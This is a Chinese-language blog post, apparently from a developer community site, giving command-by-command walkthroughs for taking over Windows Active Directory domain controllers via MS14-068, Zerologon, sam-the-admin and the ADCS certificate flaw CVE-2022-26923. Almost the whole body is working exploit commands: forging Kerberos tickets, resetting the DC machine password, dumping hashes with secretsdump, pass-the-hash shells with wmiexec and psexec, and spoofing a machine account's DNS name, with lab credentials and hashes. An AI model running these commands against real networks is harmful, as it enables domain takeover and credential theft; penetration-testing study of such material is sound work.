备案控制台
开发者社区 开发与运维 文章 正文

【权限提升】WIN系统&AD域控&NetLogon&ADCS&PAC&KDC&CVE

2024-06-19 4
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 【权限提升】WIN系统&AD域控&NetLogon&ADCS&PAC&KDC&CVE

百度云资源链接

WIN-域控提权-CVE-2014-6324

前提条件:

1、需要域环境下一台主机普通用户账号密码

2、一台主机的管理员权限

whoami /user
net time /domain
net config workstation
ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员sid -d 域控制器地址
ms14-068.exe -u mary@god.org -p admin!@#45 -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d OWA2010CN-God.god.org
dir \\OWA2010CN-God.god.org\C$
psexec \\OWA2010CN-God.god.org cmd


image.png


CVE-2014-6324配合mimikatz拿域控主机权限


WIN-域控提权-CVE-2020-1472


CVE-2020-1472是继MS17010之后好用的NetLogon特权域控提权,影响Windows Server 2008R2至Windows Server 2019的多个版本系统,只要攻击者能访问到目标域控井且知道域控计算机名即可利用

不要求当前计算机在域内,也不要求当前计算机操作系统为Windows

计算机名:nbtscan -v -h 192.168.3.21
检测:python3 zerologon_tester.py OWA2010CN-GOD 192.168.3.21
重置空密码:python3 cve-2020-1472-exploit.py OWA2010CN-GOD 192.168.3.21
连接后导出:python3 secretsdump.py god.org/OWA2010CN-GOD\$@192.168.3.21 -no-pass
WMI连接反弹:python3 wmiexec.py god/administrator@192.168.3.21 -hashes aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7

WIN-域控提权-CVE-2021-42287

只需要域用户账号密码

https://github.com/WazeHell/sam-the-admin
python3 sam_the_admin.py god/'mary:admin!@#45' -dc-ip 192.168.3.21 -shell

WIN-域控提权-CVE-2022-26923

前提条件:

1、一个域内普通账号

2、域内存在证书服务器

Kali添加访问域内信息 /etc/hosts

192.168.1.15 xiaodi.local
192.168.1.15 xiaodi-WIN-3C7SS32SQ6R-CA
192.168.1.15 WIN-3C7SS32SQ6R.xiaodi.local

获取CA结构名和计算机名

certutil -config - -ping

域内信息

192.168.1.15
test Pass123
xiaodi-WIN-3C7SS32SQ6R-CA
WIN-3C7SS32SQ6R.xiaodi.local

申请证书

certipy req 'xiaodi.local/test:Pass123@WIN-3C7SS32SQ6R.xiaodi.local' -ca xiaodi-WIN-3C7SS32SQ6R-CA -template User -debug

检测证书

certipy auth -pfx test.pfx

添加用户:

python3 bloodyAD.py -d xiaodi.local -u test -p 'Pass123' --host 192.168.1.15 addComputer pwnmachine 'CVEPassword1234*'

设置属性:

python3 bloodyAD.py -d xiaodi.local -u test -p 'Pass123' --host 192.168.1.15 setAttribute 'CN=pwnmachine,CN=Computers,DC=xiaodi,DC=local' dNSHostName '["WIN-3C7SS32SQ6R.xiaodi.local"]'

申请证书:

certipy req 'xiaodi.local/pwnmachine$:CVEPassword1234*@192.168.1.15' -template Machine -dc-ip 192.168.1.15 -ca xiaodi-WIN-3C7SS32SQ6R-CA

检测证书:

certipy auth -pfx ./win-3c7ss32sq6r.pfx -dc-ip 192.168.1.15

获取HASH:

python3 secretsdump.py 'xiaodi.local/win-3c7ss32sq6r$@WIN-3C7SS32SQ6R.xiaodi.local' -hashes :10e02bef2258ad9b239e2281a01827a4

利用HASH:

python3 wmiexec.py xiaodi.local/administrator@192.168.1.15 -hashes aad3b435b51404eeaad3b435b51404ee:e6f01fc9f2a0dc96871220f7787164bd
文章标签:
Windows
今天是几号
目录
相关文章
技术小阿哥
|
测试技术 数据安全/隐私保护 Windows
WINDOWS SERVER 2003本地管理员、目录服务还原模式管理员、域管理员密码的破解汇总
技术小阿哥
2274 0
Brucye
|
2月前
|
存储 安全 网络协议
Windows安全加固-AD建立与加入
Windows安全加固-AD建立与加入
Brucye
83 0
雷石安全实验室
|
安全 网络协议 Linux
Netlogon域控提权(CVE-2020-1472)
Netlogon域控提权(CVE-2020-1472)
雷石安全实验室
141 0
郝奕程
|
网络协议 数据安全/隐私保护 Windows
WindowsServer2012域控服务器的安装
WindowsServer2012域控服务器的安装
郝奕程
236 0
WindowsServer2012域控服务器的安装
科技小能手
|
Windows
Windows 2008 R2 AD系列一:域用户自动加入本地管理员
科技小能手
1196 0
技术小阿哥
|
测试技术 Windows
ASA8.42的Windows AD域LDAP认证
技术小阿哥
1599 0
技术小阿哥
|
数据安全/隐私保护 Windows
Windows Server 2012 活动目录管理员密码破解
技术小阿哥
1768 0
技术小阿哥
|
安全 数据库 数据安全/隐私保护
Powershell管理系列(六)批量修改AD账户登陆到的计算机
技术小阿哥
2543 0
技术小大人
|
数据安全/隐私保护
系统管理员 AD如何还原活动目录
技术小大人
811 0
科技小能手
|
Windows
2008 R2 AD通过组策略针对用户进行限制QQ等软件的运行
科技小能手
1221 0